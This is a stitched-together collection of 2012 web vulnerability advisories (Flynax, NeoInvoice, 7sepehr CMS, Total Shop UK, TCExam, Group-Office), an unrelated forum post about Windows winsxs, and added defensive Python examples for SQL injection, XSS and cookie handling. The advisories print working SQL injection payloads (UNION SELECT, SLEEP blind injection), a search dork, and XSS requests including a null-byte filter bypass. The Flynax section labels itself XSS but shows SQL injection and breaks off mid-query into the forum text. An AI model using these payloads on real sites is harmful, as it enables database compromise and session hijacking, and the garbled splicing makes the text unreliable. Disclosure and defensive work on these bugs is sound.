Multiple non-persistent cross site scripting vulnerabilities are detected in the Flynax General Classifieds v4.0 Content Management System. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high required user interaction or a local low privileged user account. The bugs are located in the search module with the bound vulnerable Titel and Price parameters. Successful exploitation can result in account stealing, client-side phishing and client-side content request manipulation. Exploitation requires medium or high user interaction and works without a privileged web application user account.

Vulnerable Module(s):
[+] Search

Vulnerable Parameter(s):
[+] Titel
[+] Price

Proof of Concept:
=
1.1
The SQL Injection Vulnerability can be exploited by remote attackers without user interaction and without a privileged user account. For demonstration or to reproduce ...

PoC:
http://general.[SERVER]:1339/general?sort_by=-1 union all select 1,2,3,4,5,6,7,8,9,@@version,11--

--- Exception Logs ---
MYSQL ERROR
Error: Unknown column 'T1.' in 'order clause'
Query: SELECT SQL_CALC_FOUND_ROWS DISTINCT SUBSTRING_INDEX(GROUP_CONCAT(DISTINCT `T6`.`Thumbnail` ORDER BY `T6`.`Type` DESC, `T6`.`ID` ASC), ',', 1) AS `Main_photo`, `T1`.*, `T1`.`Shows`, `T3`.`Path` AS `Path`, `T3`.`Key` AS `Key`, `T3`.`Type` AS `Listing_type`, COUNT(`T6`.`Thumbnail`) AS `Photos_count`, IF(UNIX_TIMESTAMP(DATE_ADD(`T1`.`Featured_date`, INTERVAL `T2`.`Listing_period` DAY)) > UNIX_TIMESTAMP(NOW()) OR `T2`.`Listing_period` = 0, '1', '0') `Featured`
FROM `fl_listings` AS `T1`
LEFT JOIN `fl_listing_plans` AS `T2` ON `T1`.`Plan_ID` = `T2`.`ID`
LEFT JOIN `fl_categories` AS `T3` ON `T1`.`Category_ID` = `T3`.`ID`
LEFT JOIN `fl_listing_photos` AS `T6` ON `T1`.`ID` = `T6`.`Listing_ID`
LEFT JOIN `fl_accounts` AS `T7` ON `T1`.`
Re: How well does Microsoft support (and follow) their mantra keep your PC updated?
Hi,

I am not sure if I got your point.

First, winsxs is Microsoft's Windows file repository. Every part of Windows is split into components and packages. Every package will be copied into the winsxs folder. But the content of the winsxs folder doesn't represent the currently installed features. So for example you could have the IIS package in winsxs, but IIS isn't currently installed on your system. But if you would install IIS now, you won't be prompted for a Windows installation media, because the package is already in the winsxs folder.

Same applies to updates: If a new version of a package becomes available (Hotfix, Security Update or just a normal update), Windows will copy the new package into the winsxs folder, next to the already existing older version of the package. This will let the winsxs folder grow, but will also make sure that you are able to remove *every* package at *every* time you want, because you are able to reinstall the previous version.

I hope this was clear and nothing new for you. So what's your point? What's wrong when multiple versions of the Visual C++ runtimes are present in the winsxs folder? Nothing. It is only important which version is marked as active.

I agree with you: It is not nice to ship installers with outdated components. But it wouldn't be better to release an updated installer every 2 months... So if Microsoft (or any other company) ships a new program today, it should be bundled with the latest version of the component they are using, because if I haven't installed this component at the moment, I don't want to be vulnerable *after* I install a new product (BTW: Did you ever notice the end of the Office installation? Microsoft prompts you to visit Windows Update, just because they know that they will have installed a product/components which are already out of date).
From my experience, Windows Update is keeping my Windows components like Visual C++ runtimes up to date: http://f.666kb.com/i/c6auyx3go8yvhktuo.jpg

So if you noticed an undetected old version, this is a bug and should be reported to Microsoft. They often re-release Windows Updates because of wrong/improved detections.

Regarding VC++ 2005 being end of life: If you are expecting that programs compiled against a specific runtime version will be recompiled just because the runtime is end of life, you are wrong and - from my point of view - have not understood how runtimes are used and why it isn't really a risk.

But as I said in the beginning, maybe I didn't get your point.

--
Regards,
Thomas
NeoInvoice Blind SQL Injection (CVE-2012-3477)
NeoInvoice is a multi-tenant open source invoicing system that currently contains an unauthenticated blind SQL injection condition in signup_check.php. The input for the value field isn't being properly sanitized, and is used in string concatenation to create the SQL query.

See here for the offending code:
https://github.com/tlhunter/neoinvoice/blob/5e7af94641cba17df9141e95108c369cfb6e6dd5/public/signup_check.php#L29

Proof of concept:
signup_check.php?field=username&value='+OR+SLEEP(5)+OR+'

I've alerted the author but haven't heard back.

More Info: http://adamcaudill.com/2012/08/12/neoinvoice-blind-sql-injection-cve-2012-3477/
Project: https://github.com/tlhunter/neoinvoice

--Adam Caudill
http://adamcaudill.com
7sepehr CMS 2012 - Multiple SQL Injection Vulnerabilities
Title:
==
7sepehr CMS 2012 - Multiple SQL Injection Vulnerabilities

Date:
=
2012-08-12

References:
===
http://www.vulnerability-lab.com/get_content.php?id=679

VL-ID:
=
680

Common Vulnerability Scoring System:
8.3

Abstract:
=
The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered multiple SQL Injection Vulnerabilities in the 7sepehr CMS.

Report-Timeline:
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed [storm] (st...@vulnerability-lab.com)

Status:
Published

Exploitation-Technique:
===
Remote

Severity:
=
Critical

Details:
Multiple SQL Injection vulnerabilities are detected in the official 7sepehr.com Content Management System 2012. Remote attackers can execute/inject their own sql commands to compromise the affected application dbms. The vulnerabilities are located in the news_detail, news_view and content asp modules with the bound vulnerable id parameter. Successful exploitation of the remote sql injection vulnerability results in dbms or web application compromise.

Vulnerable File(s):
[+] news_Detail.asp
[+] newsview.asp
[+] contents.aspx

Vulnerable Parameter(s):
[+] id

Proof of Concept:
=
The remote sql injection vulnerabilities can be exploited by remote attackers without a privileged user account and without required user interaction. For demonstration or to reproduce ...

Dork: `Powered by 7sepehr.com`

PoC:
http://127.0.0.1:1338/news/news_Detail.asp?id=-1 union all select [SQL INJECTION VULNERABILITY]--
http://127.0.0.1:1338/news/newsview.asp?id=-1 union all select [SQL INJECTION VULNERABILITY]--
http://127.0.0.1:1338/contents.aspx?id=-1 union all select [SQL INJECTION VULNERABILITY]--

Risk:
=
The security risk of the remote sql injection vulnerabilities is estimated as critical.

Credits:
Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242

Disclaimer:
===
The information provided in this advisory is provided as it is without any warranty.
Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partial usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of the vulnerability-lab team, the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission.
Copyright © 2012 | Vulnerability Laboratory

--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com
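The three SQL injection reports above (Flynax sort_by, NeoInvoice signup field/value, 7sepehr id) land on three different input positions, and each needs a different fix: an ORDER BY column cannot be bound as a parameter, so it must come from an allow-list; a free-text value is bound; a numeric id is validated as digits and then bound. The following is an added example, not code from Flynax, NeoInvoice or 7sepehr: the table, column names, sample rows and function names are constructed for this demonstration, and SQLite stands in for the MySQL/MSSQL back ends.

```python
"""Added example (not code from Flynax, NeoInvoice or 7sepehr): the three
input positions from the advisories above, each handled so a request can
only choose data, never change the shape of the query.  The schema, column
names and sample values are constructed for this demonstration."""
import re
import sqlite3

# Constructed schema standing in for a listings table.
SCHEMA = """
CREATE TABLE listings (id INTEGER PRIMARY KEY, title TEXT, price REAL, username TEXT);
INSERT INTO listings VALUES (1, 'bike', 120.0, 'alice');
INSERT INTO listings VALUES (2, 'car', 9000.0, 'bob');
INSERT INTO listings VALUES (3, 'sofa', 80.0, 'carol');
"""

# Case 1 (Flynax sort_by): ORDER BY takes an identifier, which a driver
# cannot bind as a parameter, so the only safe handling is an allow-list
# that maps request values to fixed SQL fragments written by us.
SORT_COLUMNS = {
    "price": "price ASC",
    "price_desc": "price DESC",
    "title": "title ASC",
}

# Case 2 (NeoInvoice signup field/value): the column name is allow-listed,
# the value is bound.
ALLOWED_FIELDS = ("username", "title")

# Case 3 (7sepehr id): a numeric id is validated as digits before any SQL
# is built, then still bound, so "-1 union all select ..." never reaches
# the database.
ID_RE = re.compile(r"^[0-9]{1,9}$")


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def list_sorted(conn, sort_by):
    """Return listing ids ordered by a request-supplied sort key."""
    order = SORT_COLUMNS.get(sort_by)
    if order is None:
        raise ValueError("unknown sort key: %r" % sort_by)
    # The fragment comes from SORT_COLUMNS, never from the request string.
    rows = conn.execute("SELECT id FROM listings ORDER BY " + order).fetchall()
    return [r[0] for r in rows]


def field_in_use(conn, field, value):
    """True if some listing already has `value` in the allow-listed `field`."""
    if field not in ALLOWED_FIELDS:
        raise ValueError("unknown field: %r" % field)
    # The ? placeholder sends `value` as data: quotes, OR and SLEEP inside
    # it are compared as characters, not parsed as SQL.
    row = conn.execute(
        "SELECT COUNT(*) FROM listings WHERE %s = ?" % field, (value,)
    ).fetchone()
    return row[0] > 0


def get_listing(conn, raw_id):
    """Return the title for a request-supplied id, or None if absent."""
    if not ID_RE.match(raw_id):
        raise ValueError("id must be a positive integer: %r" % raw_id)
    row = conn.execute(
        "SELECT title FROM listings WHERE id = ?", (int(raw_id),)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = open_db()
    print(list_sorted(db, "price"))                       # [3, 1, 2]
    print(field_in_use(db, "username", "' OR 1=1 OR '"))  # False
    print(get_listing(db, "2"))                           # car
```

The allow-list in `SORT_COLUMNS` is the part most often skipped: a `sort_by` value that is not one of its keys is rejected outright rather than quoted or escaped, because no amount of escaping turns an attacker-chosen identifier into a safe one.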
Total Shop UK eCommerce Generic Cross-Site Scripting
/--\
| Total Shop UK eCommerce Generic Cross-Site Scripting |
\--/

Summary
===
The open source version of Total Shop UK eCommerce based on CodeIgniter version 2.1.2 is subject to a cross-site scripting vulnerability. The value of a generic parameter was not sufficiently sanitised before being written to a block of Javascript code. An attacker could distribute a malicious URL that would trigger this vulnerability and potentially steal session cookies, redirect the user to a malicious URL or download malware onto their machine.

CVE number: CVE-2012-4236
Impact: Medium
Vendor homepage: http://www.totalshopuk.com/
Vendor notified: 06/08/2012
Credit: Chris Cooper of Reaction Information Security (http://www.reactionis.co.uk/)

This advisory is posted at:
http://www.reactionpenetrationtesting.co.uk/totalshop-uk-generic-xss.html

Affected Products
Total Shop UK eCommerce based on CodeIgniter version 2.1.2 (open source version). Other versions may be affected.

Details
===
Generic parameters in the /application/modules/_main/views/_top.php file are written to a Javascript function in the page header without sanitisation. The entire URL, including the query string, is written (via a PHP echo construct) into a refresh_page() Javascript function. It was possible to escape the function and execute arbitrary Javascript code on the application pages. There is some character filtering in place, although this can be evaded by inserting a null (%00) character (see proof of concept).

Impact
==
An attacker might entice users to follow a malicious URL, causing Javascript code to execute in their browser, potentially stealing session cookies, redirecting the user to a malicious URL or downloading malware onto their machine.

Proof of Concept
===
Injecting the following Javascript code into a generic parameter on any application page will trigger the vulnerability, causing the page to return a Javascript alert box.
%00;};alert(String.fromCharCode(120,115,115,116,101,115,116));{//

--- Example 1 Request:
GET /?%00;};alert(String.fromCharCode(120,115,115,116,101,115,116));{//=1 HTTP/1.1
Host: 192.168.0.6
Referer: http://192.168.0.6/about

--- Example 1 Response:
--- SNIP ---
function refresh_page(){
parent.location=/?%00;};alert(String.fromCharCode(120,115,115,116,101,115,116));{//=1;
}
--- SNIP ---

Solution
Upgrade to Total Shop UK eCommerce 2.1.2_p1. Download link here:
http://sourceforge.net/projects/totalshopuk/files/TSUK_eCommerce_v2.1.2_p1.zip/download

Distribution
In addition to posting on the website, a text version of this notice has been posted to the following e-mail and Usenet news recipients.
* bugtraq () securityfocus com
* full-disclosure () lists grok org uk

Future updates of this advisory, if any, will be placed on the ReactionIS corporate website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the URL below for any updates:
http://www.reactionpenetrationtesting.co.uk/totalshop-uk-generic-xss.html

==
Reaction Information Security
Lombard House Business Centre, Suite 117, 12-17 Upper Bridge Street, Canterbury, Kent, CT1 2NF
Phone: +44 (0)1227 785050
Email: research () reactionis {dot} co {dot} uk
Web: http://www.reactionpenetrationtesting.co.uk
TCExam Edit Cross-Site Scripting
/--\
| TCExam Edit Cross-Site Scripting |
\--/

Summary
===
TCExam 11.3.007 is subject to a cross-site scripting vulnerability. A 'question_subject_id' parameter is not sufficiently sanitised before being written to the tce_edit_answer.php page. An attacker could distribute a malicious URL to specific users as part of a spear-phishing campaign. Users following the link would trigger this vulnerability which could potentially steal session cookies, redirect the user to a malicious URL or download malware onto their machine.

CVE number: CVE-2012-4238
Impact: Medium
Vendor homepage: http://www.tcexam.org/
Vendor notified: 06/08/2012
Vendor fixed: 06/08/2012
Credit: Chris Cooper of Reaction Information Security (http://www.reactionis.co.uk/)

This advisory is posted at:
http://www.reactionpenetrationtesting.co.uk/tcexam-cross-site-scripting.html

Affected Products
Confirmed in TCExam 11.3.007. Prior versions may also be affected.

Details
===
The question_subject_id parameter on the tce_edit_answer.php page was found to be subject to a cross-site scripting vulnerability. It was possible to inject arbitrary Javascript code into the parameter which is passed into the page content without sanitisation. The fact that the user must be authenticated as well as an administrator (permission level 5 or above) reduces the likelihood of a successful attack. However, the vulnerability could potentially be leveraged in a spear phishing attack, targeted at exam authors and administrators, to hijack their sessions.

Impact
==
An attacker might entice users to follow a malicious URL, causing Javascript code to execute in their browser, potentially stealing session cookies, redirecting the user to a malicious URL or downloading malware onto their machine.

Proof of Concept
===
Injecting the following Javascript code into a generic parameter on the calendar page will trigger the vulnerability, causing the page to return a Javascript alert box.
<script>alert(String.fromCharCode(120,115,115,116,101,115,116))</script>

--- Example 1 Request:
GET /TCExam/admin/code/tce_edit_answer.php?subject_module_id=2&question_subject_id=1<script>alert(String.fromCharCode(120,115,115,116,101,115,116))</script>&answer_question_id=7 HTTP/1.1
Host: 192.168.0.6
Referer: http://192.168.0.6/TCExam/admin/code/tce_edit_question.php
Cookie: PHPSESSID=db1fe2b665994ff76356e7a28abfa5df

--- Example 1 Response:
--- SNIP ---
<a href=tce_edit_question.php?subject_module_id=2&amp;question_subject_id=1\<script>alert(String.fromCharCode(120,115,115,116,101,115,116))</script>&amp;question_id=7 title=Question Management class=xmlbutton>&lt; Question Management</a></span>
--- SNIP ---

Solution
Upgrade to TCExam 11.3.008.

Distribution
In addition to posting on the website, a text version of this notice has been posted to the following e-mail and Usenet news recipients.
* bugtraq () securityfocus com
* full-disclosure () lists grok org uk

Future updates of this advisory, if any, will be placed on the ReactionIS corporate website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the URL below for any updates:
http://www.reactionpenetrationtesting.co.uk/tcexam-cross-site-scripting.html

==
Reaction Information Security
Lombard House Business Centre, Suite 117, 12-17 Upper Bridge Street, Canterbury, Kent, CT1 2NF
Phone: +44 (0)1227 785050
Email: research () reactionis {dot} co {dot} uk
Web: http://www.reactionpenetrationtesting.co.uk
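The two Reaction advisories above are the same bug in two output contexts: Total Shop echoes the request URI into a JavaScript function body, TCExam echoes a parameter into an HTML attribute. Character filtering (the kind the null byte bypassed) is the wrong tool for either; the fix is to encode for the context the value lands in. The following is an added example, not Total Shop UK or TCExam code: the two rendering functions mirror the shapes shown in the advisories' responses, with the payloads from the advisories reused as constructed test input.

```python
"""Added example (not Total Shop UK or TCExam code): encoding a request
value for the two output contexts in the advisories above, a JavaScript
string inside <script> and a quoted HTML attribute.  The rendering
functions and the sample values are constructed for this demonstration."""
import html
import json


def js_string_literal(value):
    """Encode `value` as a JavaScript string literal that is safe to place
    inside a <script> block.  json.dumps escapes quotes, backslashes and
    control characters (a NUL becomes \\u0000, so a %00 filter-bypass
    character is inert) and, with ensure_ascii, U+2028/U+2029 as well;
    the extra replacements stop '</script>' and '<!--' inside the value
    from ending the script block."""
    s = json.dumps(value)
    return s.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def render_refresh_page(request_uri):
    """The refresh_page() function from the Total Shop advisory, with the
    URL emitted as a string literal instead of being echoed raw."""
    return "function refresh_page(){ parent.location=%s; }" % js_string_literal(request_uri)


def html_attr(value):
    """Encode for a double-quoted HTML attribute: html.escape with
    quote=True turns < > & \" ' into entities, so the value can neither
    close the attribute nor start a tag."""
    return html.escape(value, quote=True)


def render_question_link(subject_module_id, question_subject_id, question_id):
    """The tce_edit_question.php link from the TCExam advisory, with every
    query-string value encoded for the attribute context."""
    href = (
        "tce_edit_question.php?subject_module_id=%s&amp;question_subject_id=%s&amp;question_id=%s"
        % (html_attr(subject_module_id), html_attr(question_subject_id), html_attr(question_id))
    )
    return '<a href="%s" title="Question Management">&lt; Question Management</a>' % href


if __name__ == "__main__":
    print(render_refresh_page("/?\x00;};alert(1);{//=1"))
    print(render_question_link("2", "1<script>alert(1)</script>", "7"))
```

For the TCExam case, encoding is the second line of defence; ids such as question_subject_id should additionally be validated as integers before they are used at all, which removes the payload entirely rather than neutralising it.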
Group-Office Cleartext Credentials Stored in Cookies
/--\
| Group-Office Cleartext Credentials Stored in Cookies |
\--/

Summary
===
Group-Office 4.0.71 was found to display a behaviour that could potentially expose a user's username and cleartext password to third-parties. Under certain circumstances the application would return two cookies, one containing the user's username and the other their cleartext password. These cookies would then be returned to the server with each request to the application.

CVE number: CVE-2012-4239
Impact: Medium
Vendor homepage: http://www.group-office.com/
Vendor notified: 19/07/2012
Vendor fixed: 25/07/2012
Credit: Chris Cooper and Joseph Sheridan of Reaction Information Security (http://www.reactionpenetrationtesting.co.uk/)

This advisory is posted at:
http://www.reactionpenetrationtesting.co.uk/group-office-cookies.html

Affected Products
Confirmed in Group-Office community 4.0.71. Other versions may also be affected.

Details
===
When logging into the application, if a user ticks the 'Remember my login on this computer until I press logout' box, and then successfully logs into the application, two cookies ('GO_UN' and 'GO_PW') are returned. These cookies contain the user's username and cleartext password respectively. The cookies are set with the 'HttpOnly' flag which would significantly reduce the chances of their disclosure during a cross-site scripting attack. However, the application does not enforce a secure channel by default, and the offending cookies are not set with the 'Secure' flag.

Impact
==
Once these cookies are stored, the user's username and password could be transferred over an insecure HTTP connection, increasing the likelihood that an attacker might be able to intercept the credentials and access the application. Furthermore, the cleartext credentials will be stored on the computer which makes them more easily accessible to an attacker with access to the machine. This significantly lowers the difficulty of exploitation.
Solution
Upgrade to Group-Office community 4.0.73.

Distribution
In addition to posting on the website, a text version of this notice has been posted to the following e-mail and Usenet news recipients.
* bugtraq () securityfocus com
* full-disclosure () lists grok org uk

Future updates of this advisory, if any, will be placed on the ReactionIS corporate website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the URL below for any updates:
http://www.reactionpenetrationtesting.co.uk/group-office-cookies.html

==
Reaction Information Security
Lombard House Business Centre, Suite 117, 12-17 Upper Bridge Street, Canterbury, Kent, CT1 2NF
Phone: +44 (0)1227 785050
Email: research () reactionis {dot} co {dot} uk
Web: http://www.reactionpenetrationtesting.co.uk
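The Group-Office advisory above describes two separable problems: the cookies carry the credentials themselves, and they are sent without the Secure flag. The following is an added example, not Group-Office code: a small checker that reports both conditions for a Set-Cookie header, next to the pattern a 'remember me' feature should use instead, a random token whose hash alone is kept server-side. The cookie name GO_REMEMBER, the in-memory token store and the sample header values are constructed for this demonstration.

```python
"""Added example (not Group-Office code): a checker that flags Set-Cookie
headers with the properties described in the advisory above, next to a
'remember me' cookie that carries a random token instead of the
credentials.  The cookie name GO_REMEMBER, the in-memory token store and
the sample headers are constructed for this demonstration."""
import hashlib
import re
import secrets
import time
from http.cookies import SimpleCookie

# Name fragments that suggest a cookie stores a credential rather than an
# opaque session or remember-me token.
CREDENTIAL_HINTS = {"pw", "pass", "password", "un", "user", "username", "login"}


def audit_set_cookie(header_value):
    """Return findings for one Set-Cookie header value (empty list = clean)."""
    jar = SimpleCookie()
    jar.load(header_value)
    findings = []
    for name, morsel in jar.items():
        parts = set(re.split(r"[^a-z0-9]+", name.lower()))
        if parts & CREDENTIAL_HINTS:
            findings.append("%s: name suggests a credential is stored client-side" % name)
        if not morsel["secure"]:
            findings.append("%s: missing Secure flag (sent over plain HTTP)" % name)
        if not morsel["httponly"]:
            findings.append("%s: missing HttpOnly flag (readable by script)" % name)
    return findings


# Server side of the remember-me feature: only sha256(token) is stored,
# so a copy of this table cannot be replayed as cookies.
TOKEN_STORE = {}
TOKEN_TTL = 14 * 24 * 3600  # seconds


def _digest(token):
    return hashlib.sha256(token.encode()).hexdigest()


def issue_remember_me(user, now=None):
    """Create a random token for `user`, remember its hash and expiry, and
    return the Set-Cookie header value.  Nothing in the cookie identifies
    the user or reveals the password."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    TOKEN_STORE[_digest(token)] = (user, now + TOKEN_TTL)
    return "GO_REMEMBER=%s; Max-Age=%d; Path=/; Secure; HttpOnly; SameSite=Strict" % (token, TOKEN_TTL)


def resolve_remember_me(token, now=None):
    """Map a presented token back to its user, or None if unknown/expired."""
    now = time.time() if now is None else now
    key = _digest(token)
    entry = TOKEN_STORE.get(key)
    if entry is None:
        return None
    user, expiry = entry
    if now > expiry:
        del TOKEN_STORE[key]
        return None
    return user


if __name__ == "__main__":
    # Constructed header in the shape the advisory describes.
    for finding in audit_set_cookie("GO_PW=hunter2; Path=/; HttpOnly"):
        print(finding)
    hdr = issue_remember_me("alice")
    print(audit_set_cookie(hdr))  # []
```

The audit runs over any Set-Cookie value captured from a proxy or from `curl -i`, and the remember-me half shows why the fix in 4.0.73 is more than adding a flag: a token can be revoked server-side by deleting one hash, while a password in a cookie stays valid until the password itself changes.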